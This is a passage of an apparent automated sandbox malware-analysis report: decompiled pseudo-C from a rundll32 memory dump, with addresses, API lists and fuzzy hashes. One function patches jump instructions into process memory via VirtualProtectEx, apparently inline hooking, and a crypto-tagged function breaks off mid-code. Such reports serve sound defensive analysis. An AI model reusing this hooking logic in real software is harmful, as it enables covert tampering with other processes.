				r9d = r9d | 0xffffffff;
				r10d = 0;
				_t75 =  *0xc815332c - r10d; // 0xa
				_t118 = __rdx;
				_t97 = __rcx;
				if (_t75 <= 0) goto 0xc809a5f2;
				_t107 = __rax * 0x3c;
				_t92 =  *0xc8153320; // 0x285c6070000
				if ( *((char*)(_t107 + _t92)) == 0) goto 0xc809a5df;
				if ( *((intOrPtr*)(_t107 + _t92 + 0x28)) != __rdx) goto 0xc809a5df;
				_t108 =  *((intOrPtr*)(_t107 + _t92 + 0x30));
				r8d = 0;
				_t78 =  *_t108 - r8d;
				if (_t78 <= 0) goto 0xc809a5d9;
				asm("lock bts dword [ecx+edx+0x4], 0x0");
				if (_t78 >= 0) goto 0xc809a5d6;
				r8d = r8d + 1;
				if (r8d -  *_t108 < 0) goto 0xc809a5bc;
				goto 0xc809a5d9;
				r9d = r8d;
				if (r9d != 0xffffffff) goto 0xc809a5ed;
				r10d = r10d + 1;
				_t81 = r10d -  *0xc815332c; // 0xa
				if (_t81 < 0) goto 0xc809a594;
				if (_t108 != 0) goto 0xc809a612;
				E00000285285C809A884(_t66, _t92, __rcx, __rdx, __rdx, _t119); // executed
				_t109 = _t92;
				if (_t92 == 0) goto 0xc809a616;
				 *_t92 = 0x42;
				r9d = 0;
				 *((intOrPtr*)(_t92 + 4)) = 1;
				 *(_t97 + 0x38) = r9d;
				 *(_t97 + 0x30) = _t109;
				if (_t109 != 0) goto 0xc809a626;
				goto 0xc809a73a;
				r8d = 0x2c;
				_t117 = _t92 * 0x3e + _t109;
				_t13 = _t117 + 0x16; // 0x16
				_t120 = _t13;
				E00000285285C809A828(0x90, _t120);
				_t56 = E00000285285C809B0D8(_t65, 0x90, _t73, _t97,  *((intOrPtr*)(_t97 + 1)), _t120);
				 *(_t97 + 9) = _t56 & 0x000000ff;
				if (_t56 != 0) goto 0xc809a660;
				 *(_t117 + 4) =  *(_t117 + 4) & 0x00000000;
				goto 0xc809a61f;
				_t111 =  *((intOrPtr*)(_t97 + 1));
				_t126 = _t97 + 0xa;
				if (_t126 == 0) goto 0xc809a686;
				if (_t111 == 0) goto 0xc809a686;
				_t88 = _t56;
				if (_t88 == 0) goto 0xc809a686;
				 *_t126 =  *_t111;
				if (_t88 != 0) goto 0xc809a676;
				 *((long long*)(_t97 + 0x28)) = _t118;
				_t21 = _t117 + 4; // 0x4
				 *0xc81530a0 = _t120;
				 *(_t117 + 0xa) =  *(_t117 + 0xa) & 0x00000000;
				_a25 = _t21 -  *((intOrPtr*)(_t97 + 1)) - 1;
				r9d = 0x40;
				 *((short*)(_t117 + 8)) = 0x25ff;
				 *((long long*)(_t117 + 0xe)) = 0x285c8057db0;
				r8d =  *(_t97 + 9) & 0x000000ff;
				_t94 =  &_a32;
				_v40 = _t94;
				_a24 = 0xe9;
				_t61 = VirtualProtectEx(??, ??, ??, ??, ??); // executed
				if (_t61 == 0) goto 0xc809a65a;
				 *(_t117 + 0x36) =  *(_t117 + 0x36) & 0x00000000;
				 *((short*)(_t117 + 0x34)) = 0x25ff;
				 *((long long*)(_t117 + 0x3a)) = _t94 +  *((intOrPtr*)(_t97 + 1));
				_t128 =  *((intOrPtr*)(_t97 + 1));
				if (_t128 == 0) goto 0xc809a714;
				 *_t128 = _a24;
				 *((char*)(_t128 + 4)) = _a28;
				r8d =  *(_t97 + 9) & 0x000000ff;
				r9d = _a32;
				_v40 =  &_a32;
				VirtualProtectEx(??, ??, ??, ??, ??); // executed
				return 1;
			}




























                0x285c809a568
                0x285c809a56d
                0x285c809a572
                0x285c809a57e
                0x285c809a582
                0x285c809a585
                0x285c809a58c
                0x285c809a58f
                0x285c809a592
                0x285c809a597
                0x285c809a59b
                0x285c809a5a6
                0x285c809a5ad
                0x285c809a5af
                0x285c809a5b4
                0x285c809a5b7
                0x285c809a5ba
                0x285c809a5c3
                0x285c809a5ca
                0x285c809a5cc
                0x285c809a5d2
                0x285c809a5d4
                0x285c809a5d6
                0x285c809a5dd
                0x285c809a5df
                0x285c809a5e4
                0x285c809a5eb
                0x285c809a5f0
                0x285c809a5f5
                0x285c809a5fa
                0x285c809a600
                0x285c809a602
                0x285c809a608
                0x285c809a60b
                0x285c809a612
                0x285c809a616
                0x285c809a61d
                0x285c809a621
                0x285c809a629
                0x285c809a633
                0x285c809a638
                0x285c809a638
                0x285c809a63f
                0x285c809a64b
                0x285c809a653
                0x285c809a658
                0x285c809a65a
                0x285c809a65e
                0x285c809a660
                0x285c809a664
                0x285c809a66b
                0x285c809a670
                0x285c809a672
                0x285c809a674
                0x285c809a67b
                0x285c809a684
                0x285c809a686
                0x285c809a68a
                0x285c809a68d
                0x285c809a6a0
                0x285c809a6a6
                0x285c809a6aa
                0x285c809a6b0
                0x285c809a6bb
                0x285c809a6c2
                0x285c809a6c7
                0x285c809a6d0
                0x285c809a6d5
                0x285c809a6da
                0x285c809a6e2
                0x285c809a6e8
                0x285c809a6ec
                0x285c809a6f8
                0x285c809a6fc
                0x285c809a703
                0x285c809a709
                0x285c809a710
                0x285c809a714
                0x285c809a71e
                0x285c809a726
                0x285c809a72f
                0x285c809a746

                APIs
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: ProtectVirtual
                • String ID:
                • API String ID: 544645111-0
                • Opcode ID: 4bf50c46bb647c84ff8375c8539a0b715aed05018f51fe42ab3b111d6a1aa26d
                • Instruction ID: 9b6b5ccd186a25ce60f2b9866e12c927f93b54202a973a93db5ecb0f9d60585b
                • Opcode Fuzzy Hash: 4bf50c46bb647c84ff8375c8539a0b715aed05018f51fe42ab3b111d6a1aa26d
                • Instruction Fuzzy Hash: DD51F67A306FA08AEB509F24E509359BBA1F745B98F08C226DB6517BD4DF3CC451CB50
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000285C80A09D0 Relevance: 3.0, APIs: 2, Instructions: 39memoryCOMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 65%
                			E00000285285C80A09D0(long long __rax, long long __rbx, signed long long* __rcx, void* __rdx, long long __rsi, void* __r8, void* __r9, long long _a8, long long _a16, long long _a24, long long _a32) {
				long long _v32;
				signed int _v40;
				void* __rdi;
				void* _t13;
				void* _t15;
				long long _t20;
				long long _t23;
				signed long long* _t31;
				void* _t33;
				void* _t35;
				void* _t42;

				_t20 = __rax;
				_v32 = 0xfffffffe;
				_a8 = __rbx;
				_a32 = __rsi;
				_t33 = __r9;
				_t42 = __rdx;
				_t31 = __rcx;
				_v40 = _v40 & 0x00000000;
				E00000285285C80A15B8(_t13, __rcx, __r8);
				_t23 = _t20;
				_a16 = _t20;
				_a24 = _t20;
				if (_t20 == 0) goto 0xc80a0a2c;
				_t15 = E00000285285C80A0950(_t23, _t20, _t42, __r8, _t33); // executed
				 *_t31 =  *_t31 & 0x00000000;
				_t31[1] = _t31[1] & 0x00000000;
				_t10 = _t23 + 0x10; // 0x10
				return E00000285285C80A135C(_t15, _t23, _t31, _t10, _t31, _t33, _t35, _t23);
			}














                0x285c80a09d0
                0x285c80a09da
                0x285c80a09e3
                0x285c80a09e8
                0x285c80a09ed
                0x285c80a09f3
                0x285c80a09f6
                0x285c80a09f9
                0x285c80a0a03
                0x285c80a0a08
                0x285c80a0a0b
                0x285c80a0a10
                0x285c80a0a18
                0x285c80a0a26
                0x285c80a0a2c
                0x285c80a0a30
                0x285c80a0a35
                0x285c80a0a5a

                APIs
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Exception$AllocPtr::__Ptr_baseStatic
                • String ID:
                • API String ID: 2446911711-0
                • Opcode ID: 3ee81a84e783e839f3571ab78e40daf51b1fb701907726a107132894d7ed6ea7
                • Instruction ID: d1de616a2d23677844537d501ba28437bdfbdcd7b6237060e29164444bc647e3
                • Opcode Fuzzy Hash: 3ee81a84e783e839f3571ab78e40daf51b1fb701907726a107132894d7ed6ea7
                • Instruction Fuzzy Hash: 9801D636216F9082E7008B52B84439AB390F788FF4F148725AEAC17BDADF7CC0528B00
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000285C80DB70C Relevance: 1.6, APIs: 1, Instructions: 124COMMON
                Download Yara Rule
                C-Code - Quality: 19%
                			E00000285285C80DB70C(signed int __esi, long long __rbx, void* __rdx, long long __rsi, signed long long*** __r8, long long __r9, long long _a8, long long _a16, long long _a32) {
				signed long long _v48;
				signed long long _v56;
				signed long long _v64;
				signed long long _v72;
				signed long long _t50;
				intOrPtr* _t54;
				signed long long _t57;
				signed long long _t61;
				signed long long _t62;
				signed long long _t63;
				signed long long _t72;
				signed long long _t73;
				signed int* _t74;
				signed long long _t77;
				signed long long _t81;
				signed long long _t82;
				signed long long _t84;
				signed long long _t92;
				signed long long*** _t97;

				_a8 = __rbx;
				_a16 = __rsi;
				_a32 = __r9;
				_t97 = __r8;
				E00000285285C80D3CEC();
				_t72 =  *((intOrPtr*)( *((intOrPtr*)(__r8))));
				if (_t72 != 0) goto 0xc80db74a;
				goto 0xc80db88a;
				_t81 =  *0xc814c720; // 0xee50a592130
				r8d = __esi;
				r8d = r8d & 0x0000003f;
				_t77 = _t81 ^  *_t72;
				asm("dec eax");
				_v56 = _t77;
				_t61 = _t81 ^  *(_t72 + 8);
				asm("dec eax");
				_v72 = _t61;
				_t7 = _t77 - 1; // 0xee50a59212f
				_t50 = _t7;
				if (_t50 - 0xfffffffd > 0) goto 0xc80db880;
				_v64 = _t77;
				_v48 = _t61;
				r13d = 0x40;
				asm("dec eax");
				_t62 = _t61 - 8;
				_v72 = _t62;
				if (_t62 - _t77 < 0) goto 0xc80db7c4;
				if ( *_t62 != (_t50 ^ _t81)) goto 0xc80db7bf;
				goto 0xc80db7aa;
				if (_t62 - _t77 >= 0) goto 0xc80db80e;
				_t63 = _t62 | 0xffffffff;
				if (_t77 == _t63) goto 0xc80db7dc;
				E00000285285C80DA780(_t50 ^ _t81, _t77);
				_t82 =  *0xc814c720; // 0xee50a592130
				r13d = r13d - (__esi & 0x0000003f);
				asm("dec eax");
				_t73 = _t72 ^ _t82;
				 *( *( *_t97)) = _t73;
				( *( *_t97))[1] = _t73;
				_t54 =  *_t97;
				 *( *_t54 + 0x10) = _t73;
				goto 0xc80db880;
				asm("dec eax");
				 *_t63 = _t54;
				 *0xc80f7698(); // executed
				TlsFree(??); // executed
				_t74 =  *( *_t97);
				_t84 =  *0xc814c720; // 0xee50a592130
				r8d = __esi;
				r8d = r8d & 0x0000003f;
				_t92 = _t84 ^  *_t74;
				asm("dec ecx");
				_t57 = _t74[2] ^ _t84;
				asm("dec eax");
				if (_t92 != _t77) goto 0xc80db85b;
				if (_t57 == _t61) goto 0xc80db87b;
				_v64 = _t92;
				_v56 = _t92;
				_v48 = _t57;
				_v72 = _t57;
				goto 0xc80db79c;
				E00000285285C80D3D40();
				return 0;
			}






















                0x285c80db70c
                0x285c80db711
                0x285c80db716
                0x285c80db72b
                0x285c80db730
                0x285c80db739
                0x285c80db73f
                0x285c80db745
                0x285c80db74a
                0x285c80db751
                0x285c80db754
                0x285c80db75b
                0x285c80db761
                0x285c80db764
                0x285c80db76c
                0x285c80db770
                0x285c80db773
                0x285c80db778
                0x285c80db778
                0x285c80db780
                0x285c80db789
                0x285c80db791
                0x285c80db796
                0x285c80db7a4
                0x285c80db7aa
                0x285c80db7ae
                0x285c80db7b6
                0x285c80db7bb
                0x285c80db7bd
                0x285c80db7c2
                0x285c80db7c4
                0x285c80db7cb
                0x285c80db7d0
                0x285c80db7d5
                0x285c80db7e1
                0x285c80db7e9
                0x285c80db7ec
                0x285c80db7f5
                0x285c80db7fe
                0x285c80db802
                0x285c80db808
                0x285c80db80c
                0x285c80db816
                0x285c80db819
                0x285c80db81f
                0x285c80db825
                0x285c80db82a
                0x285c80db82d
                0x285c80db834
                0x285c80db837
                0x285c80db83e
                0x285c80db844
                0x285c80db84b
                0x285c80db84e
                0x285c80db854
                0x285c80db859
                0x285c80db85e
                0x285c80db866
                0x285c80db86e
                0x285c80db876
                0x285c80db87b
                0x285c80db88c
                0x285c80db8aa

                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 69ab4f87d4ed671cd3057637d2d326f493590c95839ed9e94bbdcf417b247d1c
                • Instruction ID: 91305c836472c76bbe3cb21a56ccd3d76909105e41a83a50ed9a42f927f17206
                • Opcode Fuzzy Hash: 69ab4f87d4ed671cd3057637d2d326f493590c95839ed9e94bbdcf417b247d1c
                • Instruction Fuzzy Hash: B5418D3A312F6482EA14CB15E854259B3A5F798FE4F14D217EEA917BE8DF3CC4528B40
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000285C80DADA0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                Download Yara Rule
                C-Code - Quality: 60%
                			E00000285285C80DADA0(void* __ecx, void* __edx, void* __edi, long long __rbx, long long __rdi, long long __rsi, long long __r14, void* _a8, void* _a16, void* _a24, void* _a32) {
				void* _t28;
				void* _t46;
				signed long long _t61;
				long long _t63;
				intOrPtr* _t66;
				signed long long _t67;
				signed long long _t76;
				signed long long _t81;
				void* _t84;
				void* _t85;
				WCHAR* _t88;

				_t79 = __rsi;
				_t63 = __rbx;
				_t61 = _t81;
				 *((long long*)(_t61 + 8)) = __rbx;
				 *((long long*)(_t61 + 0x10)) = __rsi;
				 *((long long*)(_t61 + 0x18)) = __rdi;
				 *((long long*)(_t61 + 0x20)) = __r14;
				_t46 = r8d;
				r14d = __ecx;
				if (r8d != 0) goto 0xc80dae10;
				GetModuleHandleW(_t88);
				if (_t61 == 0) goto 0xc80dae10;
				if ( *_t61 != 0x5a4d) goto 0xc80dae10;
				_t66 =  *((intOrPtr*)(_t61 + 0x3c)) + _t61;
				if ( *_t66 != 0x4550) goto 0xc80dae10;
				if ( *((intOrPtr*)(_t66 + 0x18)) != 0x20b) goto 0xc80dae10;
				if ( *((intOrPtr*)(_t66 + 0x84)) - 0xe <= 0) goto 0xc80dae10;
				if ( *((intOrPtr*)(_t66 + 0xf8)) == _t46) goto 0xc80dae10;
				E00000285285C80DAF58(0x20b, r14d, _t61, __rbx);
				E00000285285C80D3CEC();
				if ( *0xc8152800 != 0) goto 0xc80daeda;
				r15d = 1;
				 *0xc81527f0 = r15d;
				if (__edx != 0) goto 0xc80dae83;
				_t76 =  *0xc814c720; // 0xee50a592130
				asm("dec eax");
				_t62 = _t61 ^ _t76;
				_t67 =  *0xc81527f8; // 0xee50a592130
				if (_t67 == (_t61 ^ _t76)) goto 0xc80dae7a;
				asm("dec eax");
				 *0xc80f7698();
				r8d = 0;
				 *(_t76 ^ _t67)();
				goto 0xc80dae8f;
				if (__edx != r15d) goto 0xc80dae95;
				E00000285285C80DBA98(0xc8152950); // executed
				if (__edx != 0) goto 0xc80daeac;
				E00000285285C80DBCEC(_t63, 0xc80f7880, 0xc80f78a0, _t76 ^ _t67, __rsi);
				E00000285285C80DBCEC(_t63, 0xc80f78a8, 0xc80f78b0, _t76 ^ _t67, _t79);
				_t27 =  ==  ? r15d :  *0xc8152800 & 0x000000ff;
				 *0xc8152800 =  ==  ? r15d :  *0xc8152800 & 0x000000ff;
				_t28 = E00000285285C80CB034(_t62, _t63, 0xc80f78b0, _t84, _t85);
				E00000285285C80D3D40();
				if (_t46 != 0) goto 0xc80daef1;
				E00000285285C80DAF0C();
				asm("int3");
				return _t28;
			}














                0x285c80dada0
                0x285c80dada0
                0x285c80dada0
                0x285c80dada3
                0x285c80dada7
                0x285c80dadab
                0x285c80dadaf
                0x285c80dadb9
                0x285c80dadbe
                0x285c80dadc4
                0x285c80dadc8
                0x285c80dadd1
                0x285c80daddb
                0x285c80dade1
                0x285c80dadea
                0x285c80dadf5
                0x285c80dadfe
                0x285c80dae06
                0x285c80dae0b
                0x285c80dae15
                0x285c80dae22
                0x285c80dae28
                0x285c80dae31
                0x285c80dae39
                0x285c80dae3b
                0x285c80dae4e
                0x285c80dae51
                0x285c80dae54
                0x285c80dae5e
                0x285c80dae65
                0x285c80dae6b
                0x285c80dae71
                0x285c80dae78
                0x285c80dae81
                0x285c80dae86
                0x285c80dae8f
                0x285c80dae97
                0x285c80daea7
                0x285c80daeba
                0x285c80daec8
                0x285c80daecc
                0x285c80daed4
                0x285c80daedf
                0x285c80daee6
                0x285c80daeeb
                0x285c80daef0
                0x285c80daf0b

                APIs
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: HandleModule$AddressFreeLibraryProc
                • String ID:
                • API String ID: 3947729631-0
                • Opcode ID: 849623d9c797c720e54815ebb49edc999433eb98e2be7115e3a12f13f8e5b1a2
                • Instruction ID: 56f4801cc2f965b3f906d32251e0aee5779caac3b70f6fad26813bf8ac801a09
                • Opcode Fuzzy Hash: 849623d9c797c720e54815ebb49edc999433eb98e2be7115e3a12f13f8e5b1a2
                • Instruction Fuzzy Hash: 4B419E2E613F7082FB249B65D45A36922A2FB96F80F44D42BDA09676D1DF3DC846CF40
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000285C80A0950 Relevance: 1.5, APIs: 1, Instructions: 38COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 100%
                			E00000285285C80A0950(long long __rbx, long long __rcx, long long __rdx, intOrPtr* __r8, intOrPtr* __r9, long long _a16, void* _a24) {
				long long _v32;
				void* __rdi;
				void* __rsi;
				void* _t13;
				void* _t14;
				void* _t16;
				void* _t17;
				void* _t19;
				long long _t23;
				long long _t25;
				long long _t31;
				intOrPtr* _t34;
				void* _t36;

				_t25 = __rcx;
				_t19 = _t36;
				 *((long long*)(_t19 + 0x10)) = __rdx;
				 *((long long*)(_t19 + 8)) = __rcx;
				 *((long long*)(_t19 - 0x28)) = 0xfffffffe;
				 *((long long*)(_t19 + 0x18)) = __rbx;
				_t34 = __r9;
				_t23 = __rcx;
				 *((intOrPtr*)(__rcx + 8)) = 1;
				 *((intOrPtr*)(__rcx + 0xc)) = 1;
				 *((long long*)(__rcx)) = 0xc80f7b48;
				_t7 = _t25 + 0x10; // 0x10
				_t31 = _t7;
				r8d = 0xa0;
				E00000285285C80C8EF0(_t14, 0, _t16, _t17, _t31, __rdx, _t31, __r8);
				_a16 = _t31;
				_v32 = _t31;
				if (_t31 == 0) goto 0xc80a09bf;
				r8b =  *_t34;
				_t13 = E00000285285C80A0AF8(_t23, _t31,  *__r8, _t31, _t34, __r8); // executed
				return _t13;
			}
















                0x285c80a0950
                0x285c80a0950
                0x285c80a0953
                0x285c80a0957
                0x285c80a0963
                0x285c80a096b
                0x285c80a096f
                0x285c80a0975
                0x285c80a097d
                0x285c80a0980
                0x285c80a098a
                0x285c80a098d
                0x285c80a098d
                0x285c80a0993
                0x285c80a099c
                0x285c80a09a1
                0x285c80a09a6
                0x285c80a09ae
                0x285c80a09b0
                0x285c80a09b9
                0x285c80a09cf

                APIs
                • __ExceptionPtr::__ExceptionPtr.LIBCPMT ref: 00000285C80A09B9
                  • Part of subcall function 00000285C80A0AF8: EncodePointer.KERNEL32 ref: 00000285C80A0BE7
                  • Part of subcall function 00000285C80A0AF8: __ExceptionPtr::_CallCopyCtor.LIBCPMT ref: 00000285C80A0C31
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Exception$CallCopyCtorEncodePointerPtr::_Ptr::__
                • String ID:
                • API String ID: 1376364169-0
                • Opcode ID: 46d2c3a1ecbbe3245fce4663c78dad321fa76ba8b756435cf62105fadf4d1971
                • Instruction ID: 7f68d612180c0e835e51e96502b36f7dadf49de5064c8335f2ade011b978813b
                • Opcode Fuzzy Hash: 46d2c3a1ecbbe3245fce4663c78dad321fa76ba8b756435cf62105fadf4d1971
                • Instruction Fuzzy Hash: F201A236302B9481E711CF1AE544299BBA1E789FF0F29C2259EA8577A1DE39C453CB40
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000285C8055910 Relevance: 1.5, APIs: 1, Instructions: 14networkCOMMON
                Download Yara Rule
                C-Code - Quality: 16%
                			E00000285285C8055910(void* __rax) {
				void* _v424;
				void* _t9;

				E00000285285C80C51CC(_t9, __rax);
				asm("lock xadd [0xfdbb0], eax");
				if (1 != 1) goto 0xc805594b;
				__imp__#115(); // executed
				 *0xc81534e4 = 2;
				return  *0xc81534e4;
			}





                0x285c805591e
                0x285c8055928
                0x285c8055935
                0x285c805593f
                0x285c8055945
                0x285c8055952

                APIs
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Startup_onexit
                • String ID:
                • API String ID: 3012808385-0
                • Opcode ID: 02b5b6bada1194484d64ed02d6068ab445445d8aea1f25d6f1ba0bb3032c4826
                • Instruction ID: 858f46cabea8c3651f734c532916baa287b9c71054b8c5e589495af0f6f86553
                • Opcode Fuzzy Hash: 02b5b6bada1194484d64ed02d6068ab445445d8aea1f25d6f1ba0bb3032c4826
                • Instruction Fuzzy Hash: 45E0B639956AA58AEB61EB14E8483A823A5F755359F8084238115921A5DE2ECA0A8F41
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000285C809B35C Relevance: 1.4, APIs: 1, Instructions: 122stringCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: lstrcmp
                • String ID:
                • API String ID: 1534048567-0
                • Opcode ID: 4f7be571659891ed88d014e727661c5c47c76810975cf07defc41387156c96f6
                • Instruction ID: 014e55cf075dd18d90213401c6534c69651a23681325d75d0f3216939fec4a71
                • Opcode Fuzzy Hash: 4f7be571659891ed88d014e727661c5c47c76810975cf07defc41387156c96f6
                • Instruction Fuzzy Hash: 4141B127212A74A7EA24CF05E82872D73A1F744B58F44C5329B5A63B84EF7CD8919F80
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000285C80D7C38 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 37%
                			E00000285285C80D7C38(void* __eax, signed int __rcx, signed int __rdx) {
				void* __rbx;
				intOrPtr* _t22;
				signed int _t29;

				_t29 = __rdx;
				if (__rcx == 0) goto 0xc80d7c57;
				_t1 = _t29 - 0x20; // -32
				_t22 = _t1;
				if (_t22 - __rdx < 0) goto 0xc80d7c9a;
				_t25 =  ==  ? _t22 : __rcx * __rdx;
				goto 0xc80d7c7e;
				if (E00000285285C80E2620() == 0) goto 0xc80d7c9a;
				if (E00000285285C80DAB7C(_t22,  ==  ? _t22 : __rcx * __rdx,  ==  ? _t22 : __rcx * __rdx) == 0) goto 0xc80d7c9a;
				HeapAlloc(??, ??, ??); // executed
				if (_t22 == 0) goto 0xc80d7c69;
				goto 0xc80d7ca7;
				E00000285285C80D3944(_t22);
				 *_t22 = 0xc;
				return 0;
			}






                0x285c80d7c38
                0x285c80d7c47
                0x285c80d7c4b
                0x285c80d7c4b
                0x285c80d7c55
                0x285c80d7c63
                0x285c80d7c67
                0x285c80d7c70
                0x285c80d7c7c
                0x285c80d7c8d
                0x285c80d7c96
                0x285c80d7c98
                0x285c80d7c9a
                0x285c80d7c9f
                0x285c80d7cac

                APIs
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: AllocHeap
                • String ID:
                • API String ID: 4292702814-0
                • Opcode ID: cc00c99792c01c48a74819868d5af1b3ab31548aa1daff8c19e093dd554bb964
                • Instruction ID: bc853860e27782411f54de3c5d0d2ce7e39c6e0a5e58f3b157fb6a40cf9e243b
                • Opcode Fuzzy Hash: cc00c99792c01c48a74819868d5af1b3ab31548aa1daff8c19e093dd554bb964
                • Instruction Fuzzy Hash: C1F0B45D303F2585FE945BA2545D3A95280DB8AB82F1CE43F8D0AA63D2EE2CC4838F10
                Uniqueness

                Uniqueness Score: -1.00%

                Non-executed Functions

                Function 00000285C8057ED0 Relevance: 26.7, APIs: 5, Strings: 10, Instructions: 473COMMONCrypto
                Download Yara Rule
                C-Code - Quality: 26%
                			E00000285285C8057ED0(signed char __ebx, void* __edx, long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, void* __r8, signed long long __r9, signed int __r12) {
				void* __rbp;
				void* __r14;
				void* __r15;
				void* _t179;
				signed char _t184;
				void* _t188;
				void* _t189;
				void* _t203;
				void* _t219;
				void* _t221;
				void* _t222;
				int _t228;
				signed char _t237;
				signed char _t241;
				signed char _t250;
				void* _t252;
				void* _t254;
				void* _t298;
				intOrPtr _t299;
				intOrPtr _t301;
				intOrPtr* _t302;
				intOrPtr* _t304;
				intOrPtr* _t305;
				intOrPtr _t306;
				intOrPtr _t307;
				intOrPtr _t309;
				intOrPtr _t312;
				char* _t314;
				void* _t315;
				intOrPtr _t323;
				void* _t324;
				void* _t328;
				signed int _t372;
				intOrPtr _t381;
				void* _t382;
				void* _t425;
				void* _t430;
				void* _t432;
				void* _t433;
				void* _t434;
				signed long long _t458;
				signed long long _t459;
				signed long long _t460;
				void* _t469;
				signed int _t471;
				void* _t473;
				signed long long _t474;
				void* _t475;

				_t471 = __r12;
				_t458 = __r9;
				_t237 = __ebx;
				_t298 = _t433;
				_t432 = _t298 - 0x4d8;
				_t434 = _t433 - 0x5c0;
				 *((long long*)(_t432 + 0xa8)) = 0xfffffffe;
				 *((long long*)(_t298 + 8)) = __rbx;
				 *((long long*)(_t298 + 0x10)) = __rsi;
				 *((long long*)(_t298 + 0x18)) = __rdi;
				 *((long long*)(_t298 + 0x20)) = __r12;
				_t474 = __r9;
				_t425 = __r8;
				_t475 = __rdx;
				_t430 = __rcx;
				asm("xorps xmm0, xmm0");
				asm("movdqu [ebp+0x30], xmm0");
				r12d = 0;
				 *(_t432 + 0x40) = __r12;
				 *((intOrPtr*)(_t434 + 0x40)) = r12b;
				_t179 = E00000285285C8058660(__rbx, _t432 + 0x30, _t434 + 0x40);
				r9d = 0;
				_t11 = _t471 + 0x23; // 0x23
				r8d = _t11;
				_t314 =  *((intOrPtr*)(_t432 + 0x30));
				__imp__SHGetSpecialFolderPathA();
				if (_t179 != 0) goto 0xc8057f52;
				goto 0xc80585cf;
				 *(_t434 + 0x78) = __r12;
				 *((long long*)(_t432 - 0x80)) = __r12;
				 *((long long*)(_t432 - 0x80)) = 0xf;
				 *(_t434 + 0x78) = __r12;
				 *((char*)(_t434 + 0x68)) = 0;
				if ( *_t314 != 0) goto 0xc8057f77;
				goto 0xc8057f8a;
				if ( *((char*)(_t314 + (__r12 | 0xffffffff) + 1)) != 0) goto 0xc8057f80;
				E00000285285C8056B10(_t314, _t434 + 0x68, _t314, __rcx, (__r12 | 0xffffffff) + 1);
				if ( *(_t434 + 0x78) != 0) goto 0xc8057faa;
				goto 0xc8058566;
				E00000285285C80593D0(_t314, _t434 + 0x48, "\\", _t430, _t432, _t430, _t458);
				_t459 = _t458 | 0xffffffff;
				r8d = r8d ^ r8d;
				E00000285285C8058D60(_t314, _t434 + 0x68, _t298, _t425, _t430, _t432, _t430, _t459);
				_t299 =  *((intOrPtr*)(_t434 + 0x60));
				if (_t299 - 0x10 < 0) goto 0xc805802c;
				_t323 =  *((intOrPtr*)(_t434 + 0x48));
				if (_t299 + 1 - 0x1000 < 0) goto 0xc8058027;
				if (0 == 0) goto 0xc8057ffa;
				0xc80caadc();
				asm("int3");
				_t301 =  *((intOrPtr*)(_t323 - 8));
				if (_t301 - _t323 < 0) goto 0xc8058009;
				0xc80caadc();
				asm("int3");
				_t324 = _t323 - _t301;
				if (_t324 - 8 >= 0) goto 0xc8058018;
				0xc80caadc();
				asm("int3");
				if (_t324 - 0x27 <= 0) goto 0xc8058024;
				0xc80caadc();
				asm("int3");
				0xc80c51e4();
				 *((long long*)(_t434 + 0x60)) = 0xf;
				 *((long long*)(_t434 + 0x58)) = __r12;
				 *((char*)(_t434 + 0x48)) = 0;
				_t302 = _t434 + 0x68;
				if (_t425 == _t302) goto 0xc805805d;
				_t460 = _t459 | 0xffffffff;
				r8d = 0;
				E00000285285C8056C40(_t314, _t425, _t434 + 0x68, _t425, _t430, _t430, _t460);
				if ( *((char*)(_t432 + 0x500)) == 0) goto 0xc8058070;
